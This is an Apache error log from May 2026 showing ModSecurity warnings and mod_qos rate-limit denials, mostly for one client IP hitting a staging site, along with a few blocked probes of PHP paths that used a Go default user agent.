[Tue May 26 20:00:55.370196 2026] [security2:error] [pid 112029:tid 112181] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9cAAAASA"]
[Tue May 26 20:00:55.370706 2026] [security2:error] [pid 112029:tid 112281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9fwAAAYQ"]
[Tue May 26 20:00:55.372650 2026] [security2:error] [pid 112029:tid 112205] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9hAAAATg"]
[Tue May 26 20:00:55.377080 2026] [security2:error] [pid 112029:tid 112218] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9cwAAAUU"]
[Tue May 26 20:00:55.377963 2026] [security2:error] [pid 112029:tid 112266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9hgAAAXU"]
[Tue May 26 20:00:55.384411 2026] [security2:error] [pid 112029:tid 112244] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9ZAAAAV8"]
[Tue May 26 20:00:55.391158 2026] [security2:error] [pid 106517:tid 106736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rXgAAANo"]
[Tue May 26 20:00:55.391693 2026] [security2:error] [pid 106517:tid 106756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rWgAAAO4"]
[Tue May 26 20:00:55.395821 2026] [security2:error] [pid 106517:tid 106747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rbQAAAOU"]
[Tue May 26 20:00:55.402844 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rTgAAAMY"]
[Tue May 26 20:00:55.410449 2026] [security2:error] [pid 112029:tid 112246] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunqFW0C-ajaCsyFc9qwAAAWE"]
[Tue May 26 20:00:55.441146 2026] [security2:error] [pid 106517:tid 106740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1rnwAAAN4"]
[Tue May 26 20:00:55.441936 2026] [security2:error] [pid 106517:tid 106734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1rrgAAANg"]
[Tue May 26 20:00:55.441987 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1rvAAAAPE"]
[Tue May 26 20:00:55.444185 2026] [security2:error] [pid 112029:tid 112284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunqFW0C-ajaCsyFc9rAAAAYc"]
[Tue May 26 20:00:55.450499 2026] [security2:error] [pid 106517:tid 106722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1rqQAAAMw"]
[Tue May 26 20:00:55.452185 2026] [security2:error] [pid 106517:tid 106723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1rtQAAAM0"]
[Tue May 26 20:00:55.455784 2026] [security2:error] [pid 106517:tid 106708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1rtgAAAL4"]
[Tue May 26 20:00:55.474342 2026] [security2:error] [pid 106517:tid 106695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1rsQAAALE"]
[Tue May 26 20:00:55.538777 2026] [core:error] [pid 106517:tid 106728] [client 157.230.234.54:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://consultrgb.com/
[Tue May 26 20:00:55.538797 2026] [core:error] [pid 106517:tid 106728] [client 157.230.234.54:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://consultrgb.com/
[Tue May 26 20:00:55.595343 2026] [qos:error] [pid 112029:tid 112161] [client 45.148.10.120:46522] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun6FW0C-ajaCsyFc-BwAAAQw
[Tue May 26 20:00:55.595780 2026] [qos:error] [pid 112029:tid 112230] [client 45.148.10.120:46492] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun6FW0C-ajaCsyFc-CAAAAVE
[Tue May 26 20:00:55.598955 2026] [qos:error] [pid 106517:tid 106718] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sXAAAAMg
[Tue May 26 20:00:55.599564 2026] [qos:error] [pid 106517:tid 106675] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sXQAAAJ4
[Tue May 26 20:00:55.599671 2026] [qos:error] [pid 106517:tid 106707] [client 45.148.10.120:46266] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sXgAAAL0
[Tue May 26 20:00:55.603458 2026] [qos:error] [pid 112029:tid 112236] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWun6FW0C-ajaCsyFc-CQAAAVc
[Tue May 26 20:00:55.605005 2026] [qos:error] [pid 112029:tid 112247] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWun6FW0C-ajaCsyFc-CgAAAWI
[Tue May 26 20:00:55.607322 2026] [qos:error] [pid 112029:tid 112206] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWun6FW0C-ajaCsyFc-DAAAATk
[Tue May 26 20:00:55.616309 2026] [qos:error] [pid 106517:tid 106746] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWun4ZZc2DoU1lPnP1sYwAAAOQ
[Tue May 26 20:00:55.617945 2026] [qos:error] [pid 106517:tid 106747] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWun4ZZc2DoU1lPnP1sZAAAAOU
[Tue May 26 20:00:55.667865 2026] [security2:error] [pid 106517:tid 106675] [client 103.163.220.20:61707] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/as.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sagAAAJ4"]
[Tue May 26 20:00:55.744188 2026] [qos:error] [pid 112029:tid 112258] [client 45.148.10.120:46492] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun6FW0C-ajaCsyFc-DwAAAW0
[Tue May 26 20:00:55.744907 2026] [qos:error] [pid 112029:tid 112249] [client 45.148.10.120:46522] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun6FW0C-ajaCsyFc-EAAAAWQ
[Tue May 26 20:00:55.748967 2026] [qos:error] [pid 106517:tid 106649] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sbgAAAIU
[Tue May 26 20:00:55.749785 2026] [qos:error] [pid 106517:tid 106747] [client 45.148.10.120:46266] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sbwAAAOU
[Tue May 26 20:00:55.750129 2026] [qos:error] [pid 106517:tid 106751] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1scAAAAOk
[Tue May 26 20:00:55.756278 2026] [qos:error] [pid 106517:tid 106665] [client 45.148.10.120:46448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1scgAAAJQ
[Tue May 26 20:00:55.756971 2026] [qos:error] [pid 106517:tid 106665] [client 45.148.10.120:46340] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1scwAAAJQ
[Tue May 26 20:00:55.763380 2026] [qos:error] [pid 106517:tid 106758] [client 45.148.10.120:46362] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sdQAAAPA
[Tue May 26 20:00:55.774160 2026] [qos:error] [pid 106517:tid 106773] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sdwAAAP8
[Tue May 26 20:00:55.774299 2026] [qos:error] [pid 106517:tid 106761] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1seAAAAPM
[Tue May 26 20:00:55.892244 2026] [qos:error] [pid 112029:tid 112225] [client 45.148.10.120:46492] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun6FW0C-ajaCsyFc-EQAAAUw
[Tue May 26 20:00:55.897590 2026] [qos:error] [pid 112029:tid 112263] [client 45.148.10.120:46522] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun6FW0C-ajaCsyFc-EgAAAXI
[Tue May 26 20:00:55.898480 2026] [qos:error] [pid 106517:tid 106728] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sfgAAANI
[Tue May 26 20:00:55.899243 2026] [qos:error] [pid 106517:tid 106758] [client 45.148.10.120:46266] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sfwAAAPA
[Tue May 26 20:00:55.902054 2026] [qos:error] [pid 106517:tid 106773] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sgAAAAP8
[Tue May 26 20:00:55.905373 2026] [qos:error] [pid 106517:tid 106761] [client 45.148.10.120:46340] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sgQAAAPM
[Tue May 26 20:00:55.910417 2026] [qos:error] [pid 106517:tid 106729] [client 45.148.10.120:46448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sggAAANM
[Tue May 26 20:00:56.173353 2026] [security2:error] [pid 113091:tid 113242] [client 103.163.220.14:50947] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/root.php"] [unique_id "ahWuoKPxBGSmlFNOy6pAOQAAAik"]
[Tue May 26 20:00:56.274949 2026] [security2:error] [pid 106517:tid 106705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1rtAAAALs"]
[Tue May 26 20:00:56.287307 2026] [security2:error] [pid 112029:tid 112231] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunqFW0C-ajaCsyFc9tAAAAVI"]
[Tue May 26 20:00:56.288930 2026] [security2:error] [pid 112029:tid 112179] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunqFW0C-ajaCsyFc9rQAAAR4"]
[Tue May 26 20:00:56.289790 2026] [security2:error] [pid 106517:tid 106667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1rwgAAAJY"]
[Tue May 26 20:00:56.306086 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1rvgAAAJ0"]
[Tue May 26 20:00:56.313113 2026] [security2:error] [pid 106517:tid 106660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1r0gAAAI8"]
[Tue May 26 20:00:56.313400 2026] [security2:error] [pid 106517:tid 106754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1rvwAAAOw"]
[Tue May 26 20:00:56.317335 2026] [security2:error] [pid 106517:tid 106733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1rxwAAANc"]
[Tue May 26 20:00:56.334146 2026] [security2:error] [pid 112029:tid 112277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunqFW0C-ajaCsyFc9twAAAYA"]
[Tue May 26 20:00:56.339484 2026] [security2:error] [pid 106517:tid 106657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1r0wAAAIw"]
[Tue May 26 20:00:56.345755 2026] [security2:error] [pid 106517:tid 106668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1rzQAAAJc"]
[Tue May 26 20:00:56.348439 2026] [security2:error] [pid 106517:tid 106750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1rxgAAAOg"]
[Tue May 26 20:00:56.352946 2026] [security2:error] [pid 112029:tid 112241] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunqFW0C-ajaCsyFc9wQAAAVw"]
[Tue May 26 20:00:56.357900 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1r2AAAAOY"]
[Tue May 26 20:00:56.359453 2026] [security2:error] [pid 112029:tid 112229] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunqFW0C-ajaCsyFc9wgAAAVA"]
[Tue May 26 20:00:56.361896 2026] [security2:error] [pid 112029:tid 112265] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunqFW0C-ajaCsyFc90wAAAXQ"]
[Tue May 26 20:00:56.365959 2026] [security2:error] [pid 112029:tid 112174] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunqFW0C-ajaCsyFc9xgAAARk"]
[Tue May 26 20:00:56.374907 2026] [security2:error] [pid 106517:tid 106731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sJgAAANU"]
[Tue May 26 20:00:56.374935 2026] [security2:error] [pid 106517:tid 106776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1ryAAAAQI"]
[Tue May 26 20:00:56.382970 2026] [security2:error] [pid 112029:tid 112255] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6FW0C-ajaCsyFc97gAAAWo"]
[Tue May 26 20:00:56.398866 2026] [security2:error] [pid 112029:tid 112242] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6FW0C-ajaCsyFc98gAAAV0"]
[Tue May 26 20:00:56.407488 2026] [security2:error] [pid 106517:tid 106736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sJwAAANo"]
[Tue May 26 20:00:56.410984 2026] [security2:error] [pid 112029:tid 112173] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6FW0C-ajaCsyFc97wAAARg"]
[Tue May 26 20:00:56.422562 2026] [security2:error] [pid 112029:tid 112207] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunqFW0C-ajaCsyFc9vAAAATo"]
[Tue May 26 20:00:56.426025 2026] [security2:error] [pid 112029:tid 112217] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6FW0C-ajaCsyFc98wAAAUQ"]
[Tue May 26 20:00:56.431986 2026] [security2:error] [pid 113091:tid 113225] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6PxBGSmlFNOy6pAKgAAAhg"]
[Tue May 26 20:00:56.432297 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sKAAAANE"]
[Tue May 26 20:00:56.433479 2026] [security2:error] [pid 106517:tid 106689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunoZZc2DoU1lPnP1r1AAAAKs"]
[Tue May 26 20:00:56.435974 2026] [security2:error] [pid 113091:tid 113221] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6PxBGSmlFNOy6pAJwAAAhQ"]
[Tue May 26 20:00:56.444585 2026] [security2:error] [pid 106517:tid 106698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sKwAAALQ"]
[Tue May 26 20:00:56.444632 2026] [security2:error] [pid 106517:tid 106767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sNQAAAPk"]
[Tue May 26 20:00:56.450727 2026] [security2:error] [pid 106517:tid 106740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sRQAAAN4"]
